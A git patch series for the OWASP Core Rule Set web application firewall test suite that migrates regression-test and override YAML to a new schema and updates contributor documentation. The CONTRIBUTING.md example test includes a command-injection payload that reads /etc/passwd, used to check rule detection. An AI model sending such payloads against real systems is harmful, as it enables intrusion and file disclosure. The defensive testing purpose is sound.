8e7b83cf4..d141a29dd 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml @@ -22,7 +22,7 @@ tests: uri: "/" version: "HTTP/1.1" output: - status: [403, 400] + status: 400 - test_title: 920290-2 stages: - stage: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index db4f0ff8f..2c6b9a79a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -46,7 +46,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - status: [403, 400, 426, 505] + status: 400 - test_title: 920430-4 stages: - stage: @@ -91,7 +91,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - status: [403, 400] + status: 400 - test_title: 920430-7 stages: - stage: @@ -105,7 +105,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - status: [403, 400] + status: 400 - test_title: 920430-8 desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions stages: @@ -145,7 +145,7 @@ tests: uri: "/" version: HTTP/0.8 output: - status: [403, 400, 426, 505] + status: 400 - test_title: 920430-10 desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions stages: @@ -165,4 +165,4 @@ tests: uri: "/" version: JUNK/1.0 output: - status: [403, 400] + status: 400 From fc4f40ccfe64c81efae614a3e0c362217c87672b Mon Sep 17 00:00:00 2001 From: Max Leske Date: Sun, 28 Apr 2024 15:16:20 +0200 Subject: [PATCH 06/18] chore: update overrides to match schema --- tests/regression/coraza-overrides.yaml | 29 ++- tests/regression/nginx-overrides.yaml | 289 +++++-------------------- 2 files changed, 72 insertions(+), 246 deletions(-) diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml index f4312c010..9d5a8b7f9 100644 --- a/tests/regression/coraza-overrides.yaml +++ b/tests/regression/coraza-overrides.yaml @@ -6,49 +6,48 @@ meta: - purpose: "CRS test suite" test_overrides: - rule_id: 920100 - test_id: 4 + test_ids: [4] reason: 'Invalid uri, Coraza not reached - 404 page not found' output: status: 404 - rule_id: 920100 - test_id: 5 + test_ids: [5] reason: 'Invalid uri, Coraza not reached - 404 page not found' output: status: 404 - rule_id: 920100 - test_id: 8 + test_ids: [8] reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)' output: status: 200 - log_contains: "id:\"920100\"" + log: + expect_ids: [920100] - rule_id: 920270 - test_id: 4 + test_ids: [4] reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)' output: status: 200 - rule_id: 920272 - test_id: 5 + test_ids: [5] reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)' output: status: 200 - rule_id: 920290 - test_id: 1 + test_ids: [1] reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)' output: status: 200 - rule_id: 920430 - test_id: 8 + test_ids: [8] reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported' output: status: 505 - log_contains: "" - no_log_contains: "id:\"920430\"" + log: + expect_ids: [] + no_expect_ids: [920430] - rule_id: 932200 - test_id: 13 + test_ids: [13] reason: 'wip' - rule_id: 934131 - test_id: 5 - reason: 'TODO: check why we are failing to deobfuscate these payloads' - - rule_id: 934131 - test_id: 7 + test_ids: [5, 7] reason: 'TODO: check why we are failing to deobfuscate these payloads' diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 5e8f1e723..8f0372447 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -7,287 +7,114 @@ meta: - purpose: "CRS test suite" test_overrides: - rule_id: 920100 - test_id: 4 + test_ids: [4] reason: "Nginx returns a 400 bad request" output: status: 400 - expect_failure: false + expect_error: false - rule_id: 920100 - test_id: 8 + test_ids: [8] reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" output: status: 404 - expect_failure: false + expect_error: false - rule_id: 920100 - test_id: 14 + test_ids: [14] reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." - expect_failure: true + output: + expect_error: true - rule_id: 920100 - test_id: 16 + test_ids: [16] reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default" - expect_failure: true + output: + expect_error: true - rule_id: 920181 - test_id: 1 + test_ids: [1] reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" output: status: 400 - rule_id: 920270 - test_id: 4 + test_ids: [4] reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" - expect_failure: false output: + expect_error: false status: 200 - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - rule_id: 920290 - test_id: 4 + test_ids: [4] reason: "Nginx returns 400 if Host header is missing" output: - log_contains: "" + log: + expect_ids: [] status: 400 - rule_id: 920430 - test_id: 8 + test_ids: [8] reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." output: - log_contains: "" + log: + expect_ids: [] status: 505 - expect_failure: false + expect_error: false - rule_id: 932200 - test_id: 13 + test_ids: [13] reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" - expect_failure: true - - rule_id: 933110 - test_id: 3 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 13 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 14 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 20 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" output: - log_contains: "" - expect_failure: false + expect_error: true - rule_id: 933110 - test_id: 21 + test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 22 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 24 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 25 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 26 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false - - rule_id: 933110 - test_id: 27 - reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" - output: - log_contains: "" - expect_failure: false + log: + expect_ids: [] + expect_error: false - rule_id: 934131 - test_id: 5 + test_ids: [5] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" - expect_failure: true + output: + expect_error: true - rule_id: 934131 - test_id: 7 + test_ids: [7] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" - expect_failure: true + output: + expect_error: true - rule_id: 941180 - test_id: 7 + test_ids: [7] reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302" - expect_failure: true - - rule_id: 942131 - test_id: 3 - reason: "v3 log bug, the first part of the chain always produces a log" - expect_failure: true - - rule_id: 942131 - test_id: 5 - reason: "v3 log bug, the first part of the chain always produces a log" - expect_failure: true + output: + expect_error: true - rule_id: 942131 - test_id: 7 + test_ids: [3, 5, 7] reason: "v3 log bug, the first part of the chain always produces a log" - expect_failure: true - - rule_id: 942550 - test_id: 26 - reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - expect_failure: true - - rule_id: 942550 - test_id: 28 - reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - expect_failure: true - - rule_id: 942550 - test_id: 30 - reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - expect_failure: true + output: + expect_error: true - rule_id: 942550 - test_id: 32 + test_ids: [26, 28, 30, 32] reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - expect_failure: true - - rule_id: 944100 - test_id: 11 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944100 - test_id: 12 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944100 - test_id: 15 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true + output: + expect_error: true - rule_id: 944100 - test_id: 16 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944110 - test_id: 11 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944110 - test_id: 12 + test_ids: [11, 12, 15, 16] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944110 - test_id: 15 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944110 - test_id: 16 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 6 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 7 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 23 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 24 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 40 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 41 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 57 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 58 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 74 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 75 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 91 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 92 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 108 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 109 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944120 - test_id: 125 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true + output: + expect_error: true - rule_id: 944120 - test_id: 126 + test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126,] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944140 - test_id: 3 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true + output: + expect_error: true - rule_id: 944140 - test_id: 8 + test_ids: [3, 8] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944210 - test_id: 6 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944210 - test_id: 7 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944210 - test_id: 23 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944210 - test_id: 24 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 944210 - test_id: 40 - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true + output: + expect_error: true - rule_id: 944210 - test_id: 41 + test_ids: [6, 7, 23, 24, 40, 41] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" - expect_failure: true - - rule_id: 980170 - test_id: 1 - reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" - expect_failure: true + output: + expect_error: true - rule_id: 980170 - test_id: 2 + test_ids: [1, 2] reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" - expect_failure: true + output: + expect_error: true From 8e5365cc8fb681b353c61cd2ebeb28a0d3de4e3c Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 30 May 2024 21:07:09 +0200 Subject: [PATCH 07/18] chore: rebase onto @azurit's huge change --- .github/ISSUE_TEMPLATE/config.yml | 4 +- CONTRIBUTING.md | 56 +- tests/regression/README.md | 24 +- tests/regression/nginx-overrides.yaml | 2 +- .../911100.yaml | 247 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 215 +- .../920100.yaml | 447 +- .../920120.yaml | 1296 +- .../920121.yaml | 208 +- .../920160.yaml | 176 +- .../920170.yaml | 201 +- .../920171.yaml | 126 +- .../920180.yaml | 139 +- .../920181.yaml | 40 +- .../920190.yaml | 98 +- .../920200.yaml | 291 +- .../920201.yaml | 61 +- .../920202.yaml | 61 +- .../920210.yaml | 208 +- .../920220.yaml | 203 +- .../920221.yaml | 53 +- .../920230.yaml | 65 +- .../920240.yaml | 235 +- .../920250.yaml | 127 +- .../920260.yaml | 84 +- .../920270.yaml | 238 +- .../920271.yaml | 155 +- .../920272.yaml | 130 +- .../920273.yaml | 130 +- .../920274.yaml | 163 +- .../920275.yaml | 165 +- .../920280.yaml | 80 +- .../920290.yaml | 109 +- .../920300.yaml | 118 +- .../920310.yaml | 165 +- .../920311.yaml | 84 +- .../920320.yaml | 53 +- .../920330.yaml | 55 +- .../920340.yaml | 67 +- .../920341.yaml | 99 +- .../920350.yaml | 219 +- .../920360.yaml | 38 +- .../920370.yaml | 39 +- .../920380.yaml | 39 +- .../920390.yaml | 45 +- .../920400.yaml | 1751 +- .../920410.yaml | 1809 +- .../920420.yaml | 626 +- .../920430.yaml | 283 +- .../920440.yaml | 212 +- .../920450.yaml | 210 +- .../920451.yaml | 57 +- .../920460.yaml | 138 +- .../920470.yaml | 551 +- .../920480.yaml | 641 +- .../920490.yaml | 102 +- .../920500.yaml | 84 +- .../920510.yaml | 177 +- .../920520.yaml | 264 +- .../920521.yaml | 206 +- .../920530.yaml | 127 +- .../920540.yaml | 100 +- .../920600.yaml | 378 +- .../920610.yaml | 53 +- .../920620.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 331 +- .../REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 136 +- .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 122 +- .../REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 61 +- .../REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 57 +- .../REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 113 +- .../REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 165 +- .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 165 +- .../REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 103 +- .../REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 293 +- .../REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 78 +- .../REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 53 +- .../REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 327 +- .../REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 462 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 144 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 97 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 87 +- .../930100.yaml | 115 +- .../930110.yaml | 361 +- .../930120.yaml | 302 +- .../930121.yaml | 372 +- .../930130.yaml | 57 +- .../931100.yaml | 39 +- .../931110.yaml | 113 +- .../931120.yaml | 218 +- .../931130.yaml | 596 +- .../931131.yaml | 29 +- .../932120.yaml | 146 +- .../932125.yaml | 86 +- .../932130.yaml | 465 +- .../932131.yaml | 57 +- .../932140.yaml | 4865 +++-- .../932160.yaml | 399 +- .../932161.yaml | 338 +- .../932170.yaml | 34 +- .../932171.yaml | 61 +- .../932175.yaml | 452 +- .../932180.yaml | 132 +- .../932190.yaml | 185 +- .../932200.yaml | 441 +- .../932205.yaml | 206 +- .../932206.yaml | 90 +- .../932210.yaml | 200 +- .../932220.yaml | 427 +- .../932230.yaml | 1877 +- .../932231.yaml | 38 +- .../932232.yaml | 212 +- .../932235.yaml | 1171 +- .../932236.yaml | 2522 ++- .../932237.yaml | 966 +- .../932238.yaml | 312 +- .../932239.yaml | 1527 +- .../932240.yaml | 570 +- .../932250.yaml | 367 +- .../932260.yaml | 1338 +- .../932300.yaml | 262 +- .../932301.yaml | 204 +- .../932310.yaml | 235 +- .../932311.yaml | 400 +- .../932320.yaml | 320 +- .../932321.yaml | 177 +- .../932330.yaml | 30 +- .../932331.yaml | 57 +- .../932370.yaml | 121 +- .../932380.yaml | 272 +- .../933100.yaml | 234 +- .../933110.yaml | 850 +- .../933111.yaml | 43 +- .../933120.yaml | 281 +- .../933130.yaml | 165 +- .../933131.yaml | 84 +- .../933140.yaml | 33 +- .../933150.yaml | 908 +- .../933151.yaml | 220 +- .../933160.yaml | 1023 +- .../933161.yaml | 147 +- .../933170.yaml | 288 +- .../933180.yaml | 974 +- .../933190.yaml | 33 +- .../933200.yaml | 272 +- .../933210.yaml | 574 +- .../933211.yaml | 574 +- .../934100.yaml | 870 +- .../934101.yaml | 283 +- .../934110.yaml | 251 +- .../934120.yaml | 1542 +- .../934130.yaml | 364 +- .../934140.yaml | 30 +- .../934150.yaml | 30 +- .../934160.yaml | 894 +- .../934170.yaml | 96 +- .../941100.yaml | 172 +- .../941101.yaml | 86 +- .../941110.yaml | 293 +- .../941120.yaml | 166 +- .../941130.yaml | 548 +- .../941140.yaml | 117 +- .../941150.yaml | 61 +- .../941160.yaml | 443 +- .../941170.yaml | 140 +- .../941180.yaml | 204 +- .../941181.yaml | 119 +- .../941190.yaml | 148 +- .../941200.yaml | 119 +- .../941210.yaml | 152 +- .../941220.yaml | 62 +- .../941230.yaml | 60 +- .../941240.yaml | 56 +- .../941250.yaml | 60 +- .../941260.yaml | 60 +- .../941270.yaml | 58 +- .../941280.yaml | 64 +- .../941290.yaml | 60 +- .../941300.yaml | 58 +- .../941310.yaml | 383 +- .../941320.yaml | 31 +- .../941330.yaml | 58 +- .../941340.yaml | 60 +- .../941350.yaml | 30 +- .../941360.yaml | 95 +- .../941370.yaml | 292 +- .../941380.yaml | 31 +- .../941390.yaml | 245 +- .../941400.yaml | 191 +- .../942100.yaml | 409 +- .../942101.yaml | 300 +- .../942120.yaml | 1140 +- .../942130.yaml | 258 +- .../942131.yaml | 182 +- .../942140.yaml | 493 +- .../942150.yaml | 554 +- .../942151.yaml | 314 +- .../942152.yaml | 84 +- .../942160.yaml | 288 +- .../942170.yaml | 110 +- .../942180.yaml | 222 +- .../942190.yaml | 1500 +- .../942200.yaml | 58 +- .../942210.yaml | 2677 ++- .../942220.yaml | 58 +- .../942230.yaml | 326 +- .../942240.yaml | 321 +- .../942250.yaml | 29 +- .../942251.yaml | 56 +- .../942260.yaml | 31 +- .../942270.yaml | 56 +- .../942280.yaml | 58 +- .../942290.yaml | 265 +- .../942300.yaml | 89 +- .../942310.yaml | 83 +- .../942320.yaml | 361 +- .../942321.yaml | 56 +- .../942330.yaml | 151 +- .../942340.yaml | 319 +- .../942350.yaml | 116 +- .../942360.yaml | 1135 +- .../942361.yaml | 205 +- .../942362.yaml | 932 +- .../942370.yaml | 319 +- .../942380.yaml | 1483 +- .../942390.yaml | 29 +- .../942400.yaml | 64 +- .../942410.yaml | 3896 ++-- .../942420.yaml | 31 +- .../942421.yaml | 31 +- .../942430.yaml | 31 +- .../942431.yaml | 31 +- .../942432.yaml | 31 +- .../942440.yaml | 566 +- .../942450.yaml | 147 +- .../942460.yaml | 60 +- .../942470.yaml | 319 +- .../942480.yaml | 353 +- .../942490.yaml | 640 +- .../942500.yaml | 138 +- .../942510.yaml | 56 +- .../942511.yaml | 56 +- .../942520.yaml | 694 +- .../942521.yaml | 691 +- .../942522.yaml | 270 +- .../942530.yaml | 32 +- .../942540.yaml | 224 +- .../942550.yaml | 1011 +- .../942560.yaml | 61 +- .../943100.yaml | 76 +- .../943110.yaml | 138 +- .../943120.yaml | 37 +- .../944000.yaml | 38 +- .../944100.yaml | 645 +- .../944110.yaml | 645 +- .../944120.yaml | 5135 +++--- .../944130.yaml | 14861 ++++++++-------- .../944140.yaml | 261 +- .../944150.yaml | 741 +- .../944151.yaml | 772 +- .../944152.yaml | 803 +- .../944200.yaml | 18 +- .../944210.yaml | 1926 +- .../944240.yaml | 3131 ++-- .../944250.yaml | 785 +- .../944260.yaml | 61 +- .../944300.yaml | 11733 ++++++------ .../949110.yaml | 140 +- .../951110.yaml | 40 +- .../951120.yaml | 41 +- .../951130.yaml | 40 +- .../951140.yaml | 40 +- .../951150.yaml | 40 +- .../951160.yaml | 40 +- .../951170.yaml | 40 +- .../951180.yaml | 40 +- .../951190.yaml | 40 +- .../951200.yaml | 40 +- .../951210.yaml | 40 +- .../951220.yaml | 78 +- .../951230.yaml | 77 +- .../951240.yaml | 77 +- .../951250.yaml | 40 +- .../951260.yaml | 40 +- .../953100.yaml | 178 +- .../953101.yaml | 188 +- .../953120.yaml | 256 +- .../954100.yaml | 34 +- .../954120.yaml | 69 +- .../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 114 +- .../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 37 +- .../959100.yaml | 110 +- .../RESPONSE-980-CORRELATION/980170.yaml | 122 +- tests/regression/tests/base_positive_rules.py | 4 +- .../tests/positivetest-light.yaml.skeleton | 412 +- .../tests/positivetest.yaml.skeleton | 635 +- 298 files changed, 61124 insertions(+), 65282 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 3b47fbf3d..73951bb2c 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -1,8 +1,8 @@ blank_issues_enabled: false contact_links: - name: Help and support - url: https://security.stackexchange.com/questions/tagged/owasp-crs + url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list - url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project + url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 4a3e4b5b7..fc0a6aa47 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -372,23 +372,22 @@ Documentation on how to run the CRS test suite can be found in the [online docum Example of a simple *positive test*: ```yaml -- test_title: 932230-26 +- test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log_contains: id "932230" ``` This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. @@ -402,21 +401,20 @@ The rule's description field, `desc`, is important. It should describe what is b Example of a simple *negative test*: ```yaml -- test_title: 932260-4 +- test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: '/post' - output: - no_log_contains: id "932260" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + no_log_contains: id "932260" ``` This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. diff --git a/tests/regression/README.md b/tests/regression/README.md index 540fabc56..43f8e83d7 100644 --- a/tests/regression/README.md +++ b/tests/regression/README.md @@ -15,22 +15,22 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire --- meta: author: "csanders-git" - enabled: true name: "911100.yaml" description: "Description" + rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - output: - no_log_contains: "id \"911100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log: + expect_id: 911100 ``` For go-ftw, please check out from [go-ftw releases page](https://github.com/coreruleset/go-ftw/releases). diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 8f0372447..41b04c3b8 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -99,7 +99,7 @@ test_overrides: output: expect_error: true - rule_id: 944120 - test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126,] + test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: expect_error: true diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml index 49387c8c3..e66fd8cc6 100644 --- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml +++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml @@ -1,144 +1,135 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "911100.yaml" description: "Description" +rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "GET" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-2 + - 